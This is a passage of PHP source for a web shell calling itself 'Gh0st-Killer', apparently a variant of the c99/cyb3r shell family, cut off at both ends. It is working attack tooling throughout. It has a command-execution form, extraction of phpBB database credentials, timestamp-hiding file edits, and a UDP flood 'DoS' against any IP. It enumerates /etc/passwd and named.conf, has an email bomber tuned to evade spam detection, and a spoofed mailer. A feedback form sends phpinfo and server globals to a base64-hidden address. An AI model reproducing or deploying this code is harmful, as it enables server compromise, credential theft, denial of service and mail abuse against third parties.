  4635.    echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  4636.  
  4637.   }
  4638.  
  4639.   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  4640.  
  4641.   elseif ($ft == "code")
  4642.  
  4643.   {
  4644.  
  4645.    if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
  4646.  
  4647.    {
  4648.  
  4649.     $arr = explode("\n",$r);
  4650.  
  4651.     if (count($arr == 18))
  4652.  
  4653.     {
  4654.  
  4655.      include($d.$f);
  4656.  
  4657.      echo "<b>phpBB configuration is detected in this file!<br>";
  4658.  
  4659.      if ($dbms == "mysql4") {$dbms = "mysql";}
  4660.  
  4661.      if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  4662.  
  4663.      else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";}
  4664.  
  4665.      echo "Parameters for manual connect:<br>";
  4666.  
  4667.      $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  4668.  
  4669.      foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  4670.  
  4671.      echo "</b><hr size=\"1\" noshade>";
  4672.  
  4673.     }
  4674.  
  4675.    }
  4676.  
  4677.    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  4678.  
  4679.    if (!empty($white)) {@ob_clean();}
  4680.  
  4681.    highlight_file($d.$f);
  4682.  
  4683.    if (!empty($white)) {ghostext();}
  4684.  
  4685.    echo "</div>";
  4686.  
  4687.   }
  4688.  
  4689.   elseif ($ft == "download")
  4690.  
  4691.   {
  4692.  
  4693.    @ob_clean();
  4694.  
  4695.    header("Content-type: application/octet-stream");
  4696.  
  4697.    header("Content-length: ".filesize($d.$f));
  4698.  
  4699.    header("Content-disposition: attachment; filename=\"".$f."\";");
  4700.  
  4701.    echo $r;
  4702.  
  4703.    exit;
  4704.  
  4705.   }
  4706.  
  4707.   elseif ($ft == "notepad")
  4708.  
  4709.   {
  4710.  
  4711.    @ob_clean();
  4712.  
  4713.    header("Content-type: text/plain");
  4714.  
  4715.    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  4716.  
  4717.    echo($r);
  4718.  
  4719.    exit;
  4720.  
  4721.   }
  4722.  
  4723.   elseif ($ft == "img")
  4724.  
  4725.   {
  4726.  
  4727.    $inf = getimagesize($d.$f);
  4728.  
  4729.    if (!$white)
  4730.  
  4731.    {
  4732.  
  4733.     if (empty($imgsize)) {$imgsize = 20;}
  4734.  
  4735.     $width = $inf[0]/100*$imgsize;
  4736.  
  4737.     $height = $inf[1]/100*$imgsize;
  4738.  
  4739.     echo "<center><b>Size:</b>&nbsp;";
  4740.  
  4741.     $sizes = array("100","50","20");
  4742.  
  4743.     foreach ($sizes as $v)
  4744.  
  4745.     {
  4746.  
  4747.      echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  4748.  
  4749.      if ($imgsize != $v ) {echo $v;}
  4750.  
  4751.      else {echo "<u>".$v."</u>";}
  4752.  
  4753.      echo "</a>&nbsp;&nbsp;&nbsp;";
  4754.  
  4755.     }
  4756.  
  4757.     echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  4758.  
  4759.    }
  4760.  
  4761.    else
  4762.  
  4763.    {
  4764.  
  4765.     @ob_clean();
  4766.  
  4767.     $ext = explode($f,".");
  4768.  
  4769.     $ext = $ext[count($ext)-1];
  4770.  
  4771.     header("Content-type: ".$inf["mime"]);
  4772.  
  4773.     readfile($d.$f);
  4774.  
  4775.     exit;
  4776.  
  4777.    }
  4778.  
  4779.   }
  4780.  
  4781.   elseif ($ft == "edit")
  4782.  
  4783.   {
  4784.  
  4785.    if (!empty($submit))
  4786.  
  4787.    {
  4788.  
  4789.     if ($filestealth) {$stat = stat($d.$f);}
  4790.  
  4791.     $fp = fopen($d.$f,"w");
  4792.  
  4793.     if (!$fp) {echo "<b>Can't write to file!</b>";}
  4794.  
  4795.     else
  4796.  
  4797.     {
  4798.  
  4799.      echo "<b>Saved!</b>";
  4800.  
  4801.      fwrite($fp,$edit_text);
  4802.  
  4803.      fclose($fp);
  4804.  
  4805.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  4806.  
  4807.      $r = $edit_text;
  4808.  
  4809.     }
  4810.  
  4811.    }
  4812.  
  4813.    $rows = count(explode("\r\n",$r));
  4814.  
  4815.    if ($rows < 10) {$rows = 10;}
  4816.  
  4817.    if ($rows > 30) {$rows = 30;}
  4818.  
  4819.    echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  4820.  
  4821.   }
  4822.  
  4823.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  4824.  
  4825.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  4826.  
  4827.  }
  4828.  
  4829. }
  4830.  
  4831. if ($act == "about")
  4832. {
  4833. echo '<table align="center"><tr><td><b><font color="orange">Script:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>
  4834. Name: Gh0st-Killer<br>Version: '.$shver.'</font><br/><br/>Author:<br>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br>
  4835. Name: z3r0<br>Country: India<br>Website: http://ghostfleet.in<br>Email: thez3r0@outlook.com
  4836. <a href="mailto:thez3r0@outlook.com"></a><br/><br/><font color="green">Greetings:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>Members of Gh0st-Fl33T<br/>ISH, Team Hind, IEH <br/>Thanks all who report bugs and send to my email id.</font><br/></b></td></tr></table>';
  4837. }
  4838.  
  4839. if ($act == "dos")
  4840. {
  4841. ?><center><br><br><img src="http://---.png"><br>
  4842. <b>Server IP:</b> <font color="green"><?php echo $_SERVER["SERVER_ADDR"]; ?></font><br><br>
  4843. <b>Your IP:</b> <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
  4844. <form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="ddos">
  4845. IP:
  4846. <input type="text" name="ip" size="15" maxlength="15" class="main" value = "127.0.0.1" onblur = "if ( this.value=='' ) this.value = '127.0.0.1';" onfocus = " if ( this.value == '127.0.0.1' ) this.value = '';">
  4847. &nbsp;&nbsp;&nbsp;&nbsp;Time:
  4848. <input type="text" name="time" size="14" maxlength="20" class="main" value = "10" onblur = "if ( this.value=='' ) this.value = '10';" onfocus = " if ( this.value == '10' ) this.value = '';">
  4849. &nbsp;&nbsp;&nbsp;&nbsp;Port:
  4850. <input type="text" name="port" size="5" maxlength="5" class="main" value = "80" onblur = "if ( this.value=='' ) this.value = '80';" onfocus = " if ( this.value == '80' ) this.value = '';">
  4851. <br><br>
  4852. <input type="submit" value="    Start the Attack--->    ">
  4853. <br><br>
  4854. <center>After initiating the DoS attack, please wait while the browser loads.</center></form></center><?php
  4855. }
  4856.  
  4857. if ($act == "ddos")
  4858. {
  4859. $packets = 0;
  4860. $ip = $_POST['ip'];
  4861. $rand = $_POST['port'];
  4862. set_time_limit(0);
  4863. ignore_user_abort(FALSE);
  4864.  
  4865. $exec_time = $_POST['time'];
  4866.  
  4867. $time = time();
  4868. echo "<script>alert('Dos Completed!');</script>";
  4869. print "Flooded: $ip on port $rand <br><br>";
  4870. $max_time = $time+$exec_time;
  4871.  
  4872.  
  4873.  
  4874. for($i=0;$i<65535;$i++){
  4875.         $out .= "X";
  4876. }
  4877. while(1){
  4878. $packets++;
  4879.         if(time() > $max_time){
  4880.                 break;
  4881.         }
  4882.        
  4883.         $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  4884.         if($fp){
  4885.                 fwrite($fp, $out);
  4886.                 fclose($fp);
  4887.         }
  4888. }
  4889. echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
  4890. }
  4891.  
  4892. if ($act == "localdomain")
  4893. {
  4894. echo "<br><center><a href=\"".$surl."act=local\" ><b><u>Sites on this server.</u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=readable\" ><b><u>List of Users.</u></b></a></center><br>";
  4895. }
  4896.  
  4897.  if ($act == "local")
  4898.  {
  4899.     //radable public_html
  4900.    $file = @implode(@file("/etc/named.conf"));
  4901.    if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  4902.    preg_match_all("#named/(.*?).db#",$file ,$r);
  4903.    $domains = array_unique($r[1]);
  4904.  
  4905.    function check()
  4906.        {
  4907.             (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):"";
  4908.        }
  4909.  
  4910.    check();
  4911.  
  4912.    echo "<table align=center border=1 width=59% cellpadding=5>
  4913.         <tr><td colspan=2>[+] Here : [ <b>".count($domains)."</b> ] Domain ...</td></tr>
  4914.         <tr><td><b>List of Domains</b></td><td><b>List of Users</b></td></tr>";
  4915.  
  4916.    foreach($domains as $domain)
  4917.        {
  4918.        $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  4919.        echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  4920.        }
  4921.  
  4922.    echo "</table>";
  4923. //radable public_html
  4924.  }
  4925.  
  4926.  if ($act == "readable")
  4927.  {
  4928.        //entries in passwd file
  4929. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  4930. set_time_limit(0);
  4931. ###################
  4932. @$passwd = fopen('/etc/passwd','r');
  4933. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  4934. $pub = array();
  4935. $users = array();
  4936. $conf = array();
  4937. $i = 0;
  4938. while(!feof($passwd))
  4939. {
  4940. $str = fgets($passwd);
  4941. if ($i > 35)
  4942. {
  4943. $pos = strpos($str,':');
  4944. $username = substr($str,0,$pos);
  4945. $dirz = '/home/'.$username.'/public_html/';
  4946. if (($username != ''))
  4947. {
  4948. if (is_readable($dirz))
  4949. {
  4950. array_push($users,$username);
  4951. array_push($pub,$dirz);
  4952. }
  4953. }
  4954. }
  4955. $i++;
  4956. }
  4957. ###################
  4958. echo '<br><br><textarea class="output" >';
  4959. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  4960. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  4961. echo "[~] Searching for passwords in config files...\n\n";
  4962. foreach ($users as $user)
  4963. {
  4964. $path = "/home/$user/public_html/";
  4965. echo "$path \n";
  4966. }
  4967. echo "\n";
  4968. echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <- that's on the menu -> Explorer \n";
  4969. echo "[+] Done ...\n";
  4970. echo '</textarea><br><br>Coded by <b>z3r0</b> <a href=#/>Homepage</a>';
  4971.  
  4972.  
  4973.  }
  4974.  
  4975.  
  4976.  if ($act == "mailer")
  4977.  {
  4978.     ?>   <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%"  border=1>
  4979.      <tr> <!-- 1 -->
  4980.        <td valign="top" width="33%" ><p align="center"><b>(: E-Mail Bomber :)</b></p></td>
  4981.        <td valign="top" width="33%" ><p align="center"><b>[: Mass Mailer :]</b></p></td>
  4982.        <td valign="top" ><p align="center"><b>{: Anonymous Mailer :}</b></p></td>
  4983.      </tr>
  4984.      <tr><!-- 2 -->
  4985.          <td valign="top" ><center>
  4986.          <?php
  4987.     if(
  4988.         isset($_POST['to']) &&
  4989.         isset($_POST['subject']) &&
  4990.         isset($_POST['message']) &&
  4991.         isset($_POST['times']) &&
  4992.         $_POST['to'] != '' &&
  4993.         $_POST['subject'] != '' &&
  4994.         $_POST['message'] != '' &&
  4995.         $_GET['act'] =='mailbomber' &&
  4996.         $_POST['times'] != ''
  4997.     )
  4998.     {
  4999.         $times = $_POST['times'];
  5000.         while($times--)
  5001.         {
  5002.             if(isset($_POST['padding']))
  5003.             {
  5004.                 $fromPadd = rand(0,9999);
  5005.                 $subjectPadd = " -- ID : ".rand(0,9999999);
  5006.                 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
  5007.                
  5008.             }
  5009.             $from = "name$fromPadd@email.id";
  5010.             if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
  5011.             {
  5012.                 $error = 1;
  5013.                 echo "<font color='red'>Some Error Occured!</font>";
  5014.                 break;
  5015.             }
  5016.         }
  5017.         if($error != 1)
  5018.         {    echo "<font color='green'>Mail(s) Sent!</font>";       }
  5019.     }
  5020.     else
  5021.     {
  5022.         ?>
  5023.         <form method="post" action ="<?php echo $surl."act=mailbomber";?>">
  5024.                 <table>
  5025.                 <tr>
  5026.                     <td >
  5027.                         To
  5028.                     </td>
  5029.                     <td>
  5030.                         <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com,victim@target.com,victim2@target.com';"/>
  5031.                     </td>
  5032.                 </tr>
  5033.                
  5034.                 <tr>
  5035.                     <td class="title">
  5036.                         Subject
  5037.                     </td>
  5038.                     <td>
  5039.                         <input type="text" name="subject" value="Message" onfocus="if(this.value == 'Message')this.value = '';" onblur="if(this.value=='')this.value='Message';" />
  5040.                     </td>
  5041.                 </tr>
  5042.                  <tr>
  5043.                     <td >
  5044.                         No. of Times  
  5045.                     </td>
  5046.                     <td>
  5047.                         <input name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
  5048.                     </td>
  5049.                 </tr>
  5050.        
  5051.                 <tr>
  5052.                     <td>
  5053.                        
  5054.                         Pad your message (Less spam detection)
  5055.                        
  5056.                     </td>
  5057.                     <td>
  5058.                    
  5059.                         <input type="checkbox" name="padding"/>
  5060.                          
  5061.                     </td>
  5062.                 </tr>
  5063.                 <tr>
  5064.                     <td >
  5065.                         <textarea name="message" cols="25" rows="5" value="Gh0st-Killer Rocks!!.." onfocus="if(this.value == 'Gh0st-Killer Rocks!! ..')this.value = '';" onblur="if(this.value=='')this.value='Gh0st-Killer Rocks!! ..';">Gh0st-Killer Rocks!!</textarea>
  5066.                     </td>
  5067.                     <td >
  5068.                         <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
  5069.                     </td>
  5070.                 </tr>
  5071.                    
  5072.                
  5073.                
  5074.             </table>            
  5075.         </form>  
  5076.         <?php
  5077.     }
  5078.     ?>
  5079.          
  5080.          </center></td>
  5081.        
  5082.          <td valign="top"><center>
  5083.           <?PHP
  5084.     if(
  5085.         isset($_POST['to']) &&
  5086.         isset($_POST['from']) &&
  5087.         isset($_POST['subject']) &&
  5088.         $_GET['act'] =='massmailer' &&
  5089.         isset($_POST['message'])
  5090.     )
  5091.     {
  5092.  
  5093.         if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
  5094.         {
  5095.             echo "<font color='green'>Mail Sent!</font>";
  5096.         }
  5097.         else
  5098.         {
  5099.             echo "<font color='red'>Some Error Occured!</font>";
  5100.         }
  5101.     }
  5102.     else
  5103.     {
  5104.         ?>
  5105.         <form method="POST" action="<?php echo $surl."act=massmailer";?>">
  5106.            
  5107.             <table >
  5108.                 <tr>
  5109.                     <td >
  5110.                         From
  5111.                     </td>
  5112.                     <td>
  5113.                         <input name="from" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/>
  5114.                     </td>
  5115.                 </tr>
  5116.                
  5117.                 <tr>
  5118.                     <td >
  5119.                         To
  5120.                     </td>
  5121.                     <td>
  5122.                         <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@target.com,victim2@target.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com';"/>
  5123.                     </td>
  5124.                 </tr>
  5125.                
  5126.                 <tr>
  5127.                     <td class="title">
  5128.                         Subject
  5129.                     </td>
  5130.                     <td>
  5131.                         <input type="text" name="subject" value="Message" onfocus="if(this.value == 'Message')this.value = '';" onblur="if(this.value=='')this.value='Message';" />
  5132.                     </td>
  5133.                 </tr>
  5134.                
  5135.                
  5136.                 <tr>
  5137.                     <td >
  5138.                         <textarea name="message" cols="25" rows="5" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
  5139.                     </td>
  5140.                     <td >
  5141.                         <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
  5142.                     </td>
  5143.                 </tr>
  5144.                
  5145.                
  5146.                
  5147.             </table>            
  5148.         </form>  
  5149.         <?php
  5150.     }
  5151.  
  5152. ?>
  5153.          </center>
  5154.          </td>
  5155.        
  5156.         <td ><center>
  5157.          
  5158.  <form action="" method="post" enctype="multipart/form-data">
  5159.       <table border="0" class="full">
  5160.        <tr><td class="taright"><label for="fromname" accesskey="r" class="sbold">F<span class="underline">r</span>om Name:</label></td><td colspan="2"><input type="text" id="fromname" name="fromname" maxlength="100" class="full" /><label for="from" accesskey="f" class="sbold"><span class="underline">F</span>rom E-mail:</label></td><td colspan="2"><input type="text" id="from" name="from" maxlength="100" class="full" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/></td></tr>
  5161.        
  5162.        <tr><td class="taright"><label for="rcpt" accesskey="o" class="sbold">T<span class="underline">o</span>:</label></td><td colspan="2"><input type="text" id="rcpt" name="rcpt" maxlength="100" class="full" /><label for="subject" accesskey="j" class="sbold">Sub<span class="underline">j</span>ect:</label></td><td colspan="2"><input type="text" id="subject" name="subject" maxlength="100" class="full"  value="Message" onfocus="if(this.value == 'Message')this.value = '';" onblur="if(this.value=='')this.value='Message';"/></td></tr>
  5163.    
  5164.        <tr><td class="taright"><label for="reply" accesskey="p" class="sbold opt">Re<span class="underline">p</span>ly-To:</label></td><td colspan="2"><input type="text" id="reply" name="reply" maxlength="100" class="full" /><label for="errors" accesskey="s" class="sbold opt">Error<span class="underline">s</span>-To:</label></td><td colspan="2"><input type="text" id="errors" name="errors" maxlength="100" class="full" /></td></tr>
  5165.        
  5166.        <tr><td class="taright"><label for="bcc" accesskey="b" class="sbold opt"><span class="underline">B</span>CC:</label></td><td colspan="2"><input type="text" id="bcc" name="bcc" maxlength="100" class="full" /><label for="attachment" accesskey="t" class="sbold opt">A<span class="underline">t</span>tachment:</label></td><td colspan="2"><input type="file" id="attachment" name="attachment" class="full" /></td></tr>
  5167.        
  5168.        <tr><td class="taright sbold opt">Priority:</td><td colspan="2"><input type="radio" name="importance" id="lowest" value="lowest" /><label for="lowest" accesskey="w">&nbsp;Lo<span class="underline">w</span></label><input type="radio" name="importance" id="normal" value="normal" class="rbtn" checked="checked" /><label for="normal" accesskey="m">&nbsp;Nor<span class="underline">m</span>al</label><input type="radio" name="importance" id="highest" value="highest" class="rbtn" /><label for="highest" accesskey="g">&nbsp;Hi<span class="underline">g</span>h</label></td></tr>
  5169.        
  5170.        <tr><td class="vatop taright"><label for="xmailer" accesskey="l" class="sbold opt"><span id="mailer">X-Mai<span class="underline">l</span>er:</span></label></td><td colspan="2">
  5171.          <select name="xmailer" id="xmailer">
  5172.           <option value="0" selected="selected">- none -</option>
  5173.           <option value="1">Apple Mail</option>
  5174.           <option value="2">ColdFusion MX Application Server</option>
  5175.           <option value="3">E-Messenger</option>
  5176.           <option value="4">KMail</option>
  5177.  
  5178.           <option value="5">Lotus Notes</option>
  5179.           <option value="6">Microsoft Office Outlook</option>
  5180.           <option value="7">Microsoft Outlook Express</option>
  5181.           <option value="8">Microsoft Outlook IMO</option>
  5182.           <option value="9">Microsoft Windows Live Mail</option>
  5183.           <option value="10">Microsoft Windows Mail</option>
  5184.           <option value="11">Mozilla Thunderbird</option>
  5185.           <option value="12">Novell GroupWise</option>
  5186.           <option value="13">Novell GroupWise Internet Agent</option>
  5187.           <option value="14">QUALCOMM Windows Eudora Version</option>
  5188.           <option value="15">The Bat!</option>
  5189.           <option value="16">YahooMailClassic YahooMailWebService</option>
  5190.           <option value="99">Custom...</option>
  5191.          </select>
  5192.          
  5193.         </td></tr>
  5194.  
  5195.        <tr><td class="taright"><label for="date" accesskey="d" class="sbold opt"><span class="underline">D</span>ate:</label></td><td colspan="2"><input type="text" id="date" name="date" maxlength="50" value="Thu, 10 Nov 2011 18:41:04 +0100" class="datewidth" />&nbsp;<input type="checkbox" id="current" name="current" checked="checked" /><label for="current" accesskey="u">&nbsp;C<span class="underline">u</span>rrent</label></td></tr>
  5196.        <tr><td class="taright"><label for="charset" accesskey="a" class="sbold opt">Ch<span class="underline">a</span>rset:</label></td><td class="cchs">
  5197.          <select name="charset" id="charset" class="full">
  5198.           <option value="big5">big5</option>
  5199.           <option value="euc-kr">euc-kr</option>
  5200.           <option value="iso-2202-jp">iso-2202-jp</option>
  5201.           <option value="iso-8859-1">iso-8859-1</option>
  5202.           <option value="iso-8859-2">iso-8859-2</option>
  5203.           <option value="iso-8859-3">iso-8859-3</option>
  5204.           <option value="iso-8859-4">iso-8859-4</option>
  5205.           <option value="iso-8859-5">iso-8859-5</option>
  5206.           <option value="iso-8859-6">iso-8859-6</option>
  5207.           <option value="iso-8859-7">iso-8859-7</option>
  5208.           <option value="iso-8859-8">iso-8859-8</option>
  5209.           <option value="koi8-r">koi8-r</option>
  5210.           <option value="shift-jis">shift-jis</option>
  5211.           <option value="utf-8" selected="selected">utf-8</option>
  5212.           <option value="windows-1250">windows-1250</option>
  5213.           <option value="windows-1251">windows-1251</option>
  5214.           <option value="windows-1252">windows-1252</option>
  5215.           <option value="windows-1253">windows-1253</option>
  5216.           <option value="windows-1254">windows-1254</option>
  5217.           <option value="windows-1255">windows-1255</option>
  5218.           <option value="windows-1256">windows-1256</option>
  5219.           <option value="windows-1257">windows-1257</option>
  5220.           <option value="windows-1258">windows-1258</option>
  5221.           <option value="windows-874">windows-874</option>
  5222.           <option value="x-euc">x-euc</option>
  5223.           <option value="99">Custom...</option>
  5224.          </select>
  5225.         </td><td><input type="text" name="mycharset" maxlength="50" class="full" /></td></tr>
  5226.        <tr><td class="taright sbold opt">Content-Type:</td><td colspan="2"><input type="radio" name="ctype" id="plain" value="plain" checked="checked" /><label for="plain" accesskey="n">&nbsp;text/plai<span class="underline">n</span></label><input type="radio" name="ctype" id="html" value="html" class="rbtn" /><label for="html" accesskey="h" id="mrk">&nbsp;text/<span class="underline">h</span>tml</label><input type="hidden" name="rte" value="0" /></td></tr>
  5227.        <tr><td class="vatop taright"><label for="text" accesskey="x" class="sbold">Te<span class="underline">x</span>t:</label></td><td colspan="2"><textarea cols="30" rows="5" id="text" name="text" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';" />I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea></td></tr>
  5228.          <tr><td></td><td colspan="2"><input type="reset" value="Clear" class="btn" /> <input type="submit" name="ok" value="Send" class="btn sbold slarger" /></td></tr>
  5229.       </table>
  5230.      </form>
  5231.  
  5232.         </center></td>
  5233.        
  5234.      </tr>
  5235.      
  5236.  </table>   <?php
  5237.  }
  5238.  
  5239.  if ($act == "nettools")
  5240. {
  5241. echo "<br><center><a href=\"".$surl."act=proxy\" ><b><u>Proxy </u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=whois\" ><b><u>Whois </u></b></a></center><br>";
  5242. }
  5243.  
  5244.  if ($act == "feedback")
  5245.  
  5246. {
  5247.  
  5248.  $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ==");
  5249.  
  5250.  if (!empty($submit))
  5251.  
  5252.  {
  5253.  
  5254.   $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  5255.  
  5256.   $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  5257.  
  5258.   if (!empty($fdbk_ref))
  5259.  
  5260.   {
  5261.  
  5262.    $tmp = @ob_get_contents();
  5263.  
  5264.    ob_clean();
  5265.  
  5266.    phpinfo();
  5267.  
  5268.    $phpinfo = base64_encode(ob_get_contents());
  5269.  
  5270.    ob_clean();
  5271.  
  5272.    echo $tmp;
  5273.  
  5274.    $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  5275.  
  5276.   }
  5277.  
  5278.   mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  5279.  
  5280.   echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  5281.  
  5282.  }
  5283.  
  5284.  else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Hindi.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
  5285.  
  5286. }
  5287.  
  5288. if ($act == "systeminfo") {echo system('systeminfo');}
  5289.  
  5290. if ($act == "phpinfo") {@ob_clean(); phpinfo(); ghostext(); }
  5291.  
  5292. if ($act == "upload")
  5293.  
  5294. {
  5295.   echo "<b>File upload:</b><br><form enctype=\"multipart/form-data\" action=\"\" method=POST>
  5296.  
  5297. Select file on your local computer: <input name=\"uploaded\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  5298.  
  5299. Save this file dir: <input name=\"path\" size=\"70\" value=\"".getcwd()."\"><br><br>
  5300.  
  5301. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  5302.  
  5303. <input type=submit name=submit value=\"Upload\">
  5304.  
  5305. </form>";
  5306. $target = $_POST['path'];
  5307.  $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ;
  5308.  $ok=1;
  5309. if (isset($_FILES['uploaded']['name'])) {
  5310.   if (file_exists($target))
  5311.       {
  5312.       echo $_FILES["uploaded"]["name"] . " already exists. ";
  5313.       }
  5314.     else  
  5315.       {
  5316.         if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
  5317.           {
  5318.             echo "Upload: " . $_FILES["uploaded"]["name"] . "<br />";
  5319.             echo "Type: " . $_FILES["uploaded"]["type"] . "<br />";
  5320.             echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb<br />";
  5321.             echo "Stored in: " . $target;
  5322.           }
  5323.         else
  5324.          {
  5325.            echo "Sorry, there was a problem uploading your file.";
  5326.          }
  5327.       }
  5328.  }
  5329. }
  5330. if ($act == "whois")
  5331. {
  5332. global $t,$hcwd;
  5333. if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
  5334. $server =$_REQUEST['server'];
  5335. $domain=$_REQUEST['domain']."\r\n";
  5336. $ser=fsockopen($server,43,$en,$es,5);
